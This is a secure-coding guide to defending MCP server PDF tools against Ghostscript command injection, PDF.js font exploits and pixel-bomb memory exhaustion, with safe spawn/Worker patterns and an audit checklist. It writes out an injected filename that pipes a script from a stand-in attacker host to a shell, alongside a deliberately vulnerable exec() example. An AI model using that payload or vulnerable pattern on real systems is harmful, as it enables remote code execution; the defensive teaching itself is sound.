
MCP server PDF parsing security

MCP tool handlers that extract text or metadata from PDF files expose a document-processing attack surface that differs in kind from web request handling. The three main attack classes are: (1) Ghostscript command injection, where a filename containing shell metacharacters executes arbitrary commands when it is interpolated into exec("gs ..."); (2) PDF.js parser exploitation, where a crafted PDF triggers a vulnerability in the font-handling code and may achieve code execution in the Node.js context that runs the parser; and (3) pixel-bomb DoS, where a PDF embeds a compressed image that decompresses to gigabytes of pixel data and exhausts memory in the rendering process. All three are exploitable when an LLM agent passes an attacker-controlled PDF URL or file path to a document-processing tool.

Attack 1: Ghostscript command injection via filename

MCP document servers that use Ghostscript for PDF-to-text conversion often shell out via exec() or spawn(). When the filename is not properly sanitized, it becomes a command injection vector.

// WRONG — filename from tool argument passed directly to exec
import { exec } from "child_process";
import { promisify } from "util";
const execAsync = promisify(exec);

server.tool("extract_pdf_text", { filePath: z.string() }, async ({ filePath }) => {
  // filePath = "/tmp/report$(curl attacker.com/shell|sh).pdf"
  const { stdout } = await execAsync(`gs -dBATCH -dNOPAUSE -sDEVICE=txtwrite -sOutputFile=- "${filePath}"`);
  return { content: [{ type: "text", text: stdout }] };
});

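The classic bypass is embedding a command substitution in the filename: /tmp/report$(curl attacker.com/shell|sh).pdf. When the shell expands the double-quoted string, the $(…) subshell executes before Ghostscript runs. Double quotes do not help: inside them the shell still expands $(…), backticks, and variables, and a double quote embedded in the filename closes the string so that a following semicolon or newline starts a new command. Blocklist-style sanitization tends to miss at least one of these cases.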

Safe pattern: use spawn with an argument array, never a shell string.

import { spawn } from "child_process";
import path from "path";

// Hypothetical configuration: the only directory this tool may read PDFs from
const ALLOWED_PDF_DIR = path.resolve(process.env.PDF_DIR ?? "/srv/pdfs");

async function ghostscriptExtract(filePath: string): Promise<string> {
  // Validate path is within allowed directory BEFORE passing to spawn
  const resolved = path.resolve(filePath);
  if (!resolved.startsWith(ALLOWED_PDF_DIR + path.sep)) {
    throw new Error("PDF path outside allowed directory");
  }

  return new Promise((resolve, reject) => {
    // spawn with array args: no shell is involved, so metacharacters in the path are never expanded
    const gs = spawn("gs", [
      "-dBATCH", "-dNOPAUSE", "-dSAFER",   // -dSAFER restricts file access in gs
      "-sDEVICE=txtwrite",
      "-sOutputFile=-",
      resolved   // validated absolute path as a separate argument, not part of a shell string
    ], { shell: false });  // shell: false is the default; stated explicitly so it is not changed by accident

    let output = "";
    let error = "";
    gs.stdout.on("data", d => output += d);
    gs.stderr.on("data", d => error += d);
    gs.on("close", code => {
      if (code !== 0) reject(new Error(`gs exited ${code}: ${error}`));
      else resolve(output);
    });
  });
}

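Ghostscript's -dSAFER flag adds a second layer of defense. PostScript is a full programming language whose operators can perform file I/O, and -dSAFER restricts the interpreter to the files named on the command line plus any paths explicitly permitted (for example with --permit-file-read). SAFER mode has been the default since Ghostscript 9.50, but passing the flag explicitly protects deployments that still run older builds.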
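The startsWith check in ghostscriptExtract compares path strings, so a symlink inside the allowed directory could still point somewhere else. The following is a minimal sketch of a stricter check, assuming the file already exists on disk. The name resolvePdfPath and its parameters are illustrative and do not come from any library.

```typescript
import * as fs from "node:fs";
import * as path from "node:path";

// Hypothetical helper: returns the real (symlink-free) path of a PDF,
// or throws if it falls outside allowedDir.
export function resolvePdfPath(allowedDir: string, userPath: string): string {
  const base = fs.realpathSync(allowedDir);
  // realpathSync follows symlinks and throws if the file does not exist
  const real = fs.realpathSync(path.resolve(base, userPath));
  const rel = path.relative(base, real);
  const escapes =
    rel === "" || rel === ".." || rel.startsWith(".." + path.sep) || path.isAbsolute(rel);
  if (escapes) {
    throw new Error("PDF path outside allowed directory");
  }
  if (path.extname(real).toLowerCase() !== ".pdf") {
    throw new Error("Not a .pdf file");
  }
  return real;
}
```

The returned path is absolute, so it can never begin with "-" and be mistaken for a Ghostscript option when passed as a spawn argument.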

Attack 2: PDF.js parser exploitation via malicious fonts

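PDF.js is the most common pure-JavaScript PDF parser for Node.js and is used by many MCP document tools as a Ghostscript alternative. It avoids shell execution and, being written in JavaScript rather than C, is not exposed to classic memory corruption. Its font-handling code (Type1, CFF, and TrueType parsers) still processes attacker-controlled data and has had serious bugs: CVE-2024-4367, for example, allowed a crafted font to execute arbitrary JavaScript in the PDF.js context until it was fixed in pdfjs-dist 4.2.67.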

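The exploit pattern: a PDF embeds a font with crafted data, such as a malformed Type1 or CFF charstrings array or unexpected values in a font dictionary, that the parser handles without sufficient validation. In the mild case the parser throws or spins; in the worst case attacker-supplied values reach code that PDF.js generates at runtime and execute as JavaScript. Running PDF.js in a Worker thread gives the parser its own V8 isolate and heap, so an uncaught exception or heap exhaustion terminates the Worker while the main thread survives. A Worker is not a security sandbox, however: code that executes inside it has the same OS privileges as the rest of the process, so PDFs that warrant stronger isolation should be parsed in a separate, sandboxed process.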

Never run PDF.js on the main thread of an MCP server. Parse PDFs in a Worker thread with resourceLimits set. If the Worker throws or runs out of heap while parsing a malicious font, the main thread, and with it every other concurrent session, stays alive.

import { Worker, isMainThread, parentPort, workerData } from "worker_threads";

// In the main thread handler:
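server.tool("extract_pdf_text", { pdfBuffer: z.string() }, async ({ pdfBuffer }) => {
  // pdfBuffer carries the PDF bytes encoded as base64
  const text = await new Promise<string>((resolve, reject) => {
    const worker = new Worker(__filename, {
      workerData: { pdfBuffer },
      resourceLimits: {
        maxOldGenerationSizeMb: 128,  // cap the Worker's JS heap
        maxYoungGenerationSizeMb: 32,
      }
    });
    const timeout = setTimeout(() => {
      worker.terminate();
      reject(new Error("PDF parsing timeout"));
    }, 10_000);
    worker.on("message", result => {
      clearTimeout(timeout);
      worker.terminate();  // release the Worker once the result has arrived
      if (result.error) reject(new Error(result.error));
      else resolve(result.text);
    });
    // Fires on uncaught exceptions and when resourceLimits are exceeded
    worker.on("error", err => { clearTimeout(timeout); reject(err); });
    // Covers a Worker that exits without sending a result (no-op if already settled)
    worker.on("exit", code => { clearTimeout(timeout); reject(new Error(`PDF worker exited with code ${code}`)); });
  });
  return { content: [{ type: "text", text }] };
});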

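// In the Worker thread:
if (!isMainThread) {
  // Module path varies by pdfjs-dist version (4.x ships legacy/build/pdf.mjs)
  import("pdfjs-dist/legacy/build/pdf.js").then(async ({ getDocument }) => {
    try {
      // Recent pdfjs-dist versions reject a Node Buffer, so copy into a plain Uint8Array
      const data = new Uint8Array(Buffer.from(workerData.pdfBuffer, "base64"));
      // isEvalSupported: false keeps PDF.js from compiling generated code via eval / new Function
      const doc = await getDocument({ data, isEvalSupported: false }).promise;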
      const pages: string[] = [];
      for (let i = 1; i <= Math.min(doc.numPages, 100); i++) {  // cap at 100 pages
        const page = await doc.getPage(i);
        const content = await page.getTextContent();
        pages.push(content.items.map((item: any) => item.str).join(" "));
      }
      parentPort!.postMessage({ text: pages.join("\n\n") });
    } catch (err: any) {
      parentPort!.postMessage({ error: err.message });
    }
  });
}

Attack 3: Pixel-bomb DoS via embedded images

A PDF can embed raster images that decompress to enormous pixel buffers. A single 1-bit black-and-white image declared as 65535×65535 pixels (about 4.3 billion pixels) and stored as CCITT-compressed data weighs a few kilobytes in the PDF, yet it needs roughly 4.3 GB when expanded to one byte per pixel and about 17 GB as an RGBA buffer (four bytes per pixel). If the parser allocates that buffer, the process exhausts memory.
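The arithmetic behind the 65535×65535 example can be checked with a few lines. This is a sketch only: decodedImageBytes and exceedsPixelBudget are illustrative helpers, and the 50-megapixel budget is an assumed value, not a recommendation from any library.

```typescript
// Bytes needed to hold a fully decoded image of the given dimensions.
export function decodedImageBytes(width: number, height: number, bytesPerPixel: number): number {
  return width * height * bytesPerPixel;
}

// Hypothetical guard: refuse to decode images above a pixel budget.
export function exceedsPixelBudget(width: number, height: number, maxPixels = 50_000_000): boolean {
  return width * height > maxPixels;
}

const gray = decodedImageBytes(65535, 65535, 1); // 4,294,836,225 bytes (about 4.3 GB)
const rgba = decodedImageBytes(65535, 65535, 4); // 17,179,344,900 bytes (about 17.2 GB)
console.log(gray, rgba, exceedsPixelBudget(65535, 65535)); // last value is true
```

Checking declared dimensions before allocating is cheaper than recovering from an out-of-memory condition afterwards.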

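The resourceLimits.maxOldGenerationSizeMb cap bounds the Worker's V8 heap: when the parser exceeds it, V8 raises a heap out-of-memory error and Node.js terminates the Worker, which surfaces as an error event on the main thread. The limit is fixed when the Worker is constructed, so it is already in place before getDocument() runs. Node.js applies these limits to the JS heap only, not to ArrayBuffer-backed data such as decoded pixel buffers. For that reason, avoid rendering pages when only text is needed (text extraction via getTextContent() does not require rasterizing images), and enforce a process-level memory limit if you do render.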
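When a Worker exceeds its resourceLimits, Node.js reports an error whose code is ERR_WORKER_OUT_OF_MEMORY. A small sketch of mapping that to a tool-level message follows; describeWorkerError and the message wording are illustrative assumptions, not part of the MCP SDK or Node.js.

```typescript
// Hypothetical helper: turn a Worker "error" event payload into a short,
// non-revealing message for the tool result.
export function describeWorkerError(err: unknown): string {
  const code = (err as { code?: unknown } | null)?.code;
  if (code === "ERR_WORKER_OUT_OF_MEMORY") {
    return "PDF rejected: parser exceeded its memory limit";
  }
  // Do not echo internal error details back to the caller
  return "PDF rejected: parser failed";
}
```

Returning a fixed message rather than err.message avoids leaking stack or path details to whoever supplied the PDF.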

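For servers that rasterize pages with Ghostscript, limit the rendering resolution and the in-memory bitmap size:

// Ghostscript: limit DPI and bitmap size to contain pixel-bombs.
// Both options matter for raster output devices; txtwrite itself does not render images.
spawn("gs", [
  "-dBATCH", "-dNOPAUSE", "-dSAFER",
  "-r72",          // 72 DPI keeps rendered page buffers small
  "-dMaxBitmap=50000000",  // pages needing more than ~50 MB are rendered in bands, not as one bitmap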
  "-sDEVICE=txtwrite",
  "-sOutputFile=-",
  resolvedPath
], { shell: false });

Safe parsing library comparison

Library	Text extraction	Ghostscript dependency	Font parser risk	Recommendation
`pdf-lib`	No (creation and modification only)	None	None	Use for PDF creation and editing; not for extraction
`pdfjs-dist`	Yes	None	Low-Medium (pure JS, patched regularly)	Use in Worker thread with resourceLimits
`pdf-parse`	Yes (wraps pdfjs)	None	Depends on bundled pdfjs version	Pin version; run in Worker thread
Ghostscript (CLI)	Yes	Yes (native binary)	High (C binary with long CVE history)	Never call via exec(); use spawn() with array args and -dSAFER; sandbox the process
LibreOffice headless	Yes (with macro risk)	No (own engine)	High (macro execution, OLE links)	See office document security reference; not recommended for PDFs

Additional safety checks

Validate the file type before parsing. Check that the uploaded or fetched file actually starts with the PDF magic bytes (%PDF- at offset 0) before passing it to any parser. Reject files that claim to be PDFs but carry a different signature; an attacker might submit a ZIP bomb with a .pdf extension.

// Check PDF magic bytes before parsing
function isPDF(buffer: Buffer): boolean {
  return buffer.length >= 5 && buffer.slice(0, 5).toString("ascii") === "%PDF-";
}

if (!isPDF(fileBuffer)) {
  throw new Error("File is not a valid PDF");
}

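Cap file size before downloading. Check Content-Length before reading the full response body and reject PDFs above your limit (e.g., 50 MB) without downloading them. Because the header can be missing or wrong, also count bytes while streaming the body and abort once the limit is exceeded.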
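A minimal sketch of a size-capped download, assuming Node.js 18+ where fetch and Response are globals. The function name readBodyWithCap and the error messages are illustrative. It checks the declared Content-Length first and then enforces the same cap while streaming.

```typescript
// Reads a fetch Response body, refusing to buffer more than maxBytes.
export async function readBodyWithCap(response: Response, maxBytes: number): Promise<Uint8Array> {
  const declared = response.headers.get("content-length");
  if (declared !== null && Number(declared) > maxBytes) {
    await response.body?.cancel(); // drop the connection without reading the body
    throw new Error("PDF exceeds size limit (declared Content-Length)");
  }
  if (!response.body) return new Uint8Array(0);

  const reader = response.body.getReader();
  const chunks: Uint8Array[] = [];
  let total = 0;
  for (;;) {
    const { done, value } = await reader.read();
    if (done) break;
    total += value.byteLength;
    if (total > maxBytes) {
      await reader.cancel(); // stop downloading as soon as the cap is crossed
      throw new Error("PDF exceeds size limit (streamed bytes)");
    }
    chunks.push(value);
  }

  // Concatenate the chunks into one contiguous buffer
  const out = new Uint8Array(total);
  let offset = 0;
  for (const chunk of chunks) {
    out.set(chunk, offset);
    offset += chunk.byteLength;
  }
  return out;
}
```

A call such as readBodyWithCap(await fetch(url), 50 * 1024 * 1024) would apply the 50 MB limit mentioned above; url here stands for whatever address the tool was asked to fetch.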

Limit page count. PDFs with thousands of pages can make text extraction take minutes. Cap at a reasonable page limit (100 pages) and return partial results with a note.
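One way to express the page cap together with the partial-result note is sketched below. planPages and the note wording are illustrative assumptions; the default of 100 matches the limit suggested above.

```typescript
export interface PagePlan {
  pagesToRead: number;   // how many pages to extract
  truncated: boolean;    // true when the document has more pages than the cap
  note: string | null;   // text to append to the tool result when truncated
}

// Hypothetical helper: decide how many pages to extract and what to tell the caller.
export function planPages(numPages: number, maxPages = 100): PagePlan {
  const pagesToRead = Math.max(0, Math.min(numPages, maxPages));
  const truncated = numPages > pagesToRead;
  return {
    pagesToRead,
    truncated,
    note: truncated ? `[Truncated: extracted ${pagesToRead} of ${numPages} pages]` : null,
  };
}
```

For a 10,000-page document, planPages(10000) yields pagesToRead of 100 and a note reporting that 100 of 10000 pages were extracted.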

SkillAudit findings

Finding → Grade Impact

Critical: Ghostscript invoked via exec() with unsanitized filename (shell command injection). −25 points.

Critical: PDF parsing on the main thread with no Worker isolation (a font parser exploit crashes the entire MCP server). −20 points.

High: No memory cap on PDF parser Worker thread (a pixel-bomb can exhaust server memory). −12 points.

High: No file size limit before PDF download or parsing. −10 points.

High: Ghostscript invoked without -dSAFER (PostScript operators can access arbitrary filesystem paths). −10 points.

Medium: No magic-byte file type validation before PDF parsing. −5 points.

Medium: No page count limit (an attacker submits a 10,000-page PDF, causing multi-minute extraction). −5 points.

SkillAudit checks for Ghostscript exec() patterns, Worker thread isolation, resourceLimits configuration, and file type validation in MCP document tool handlers.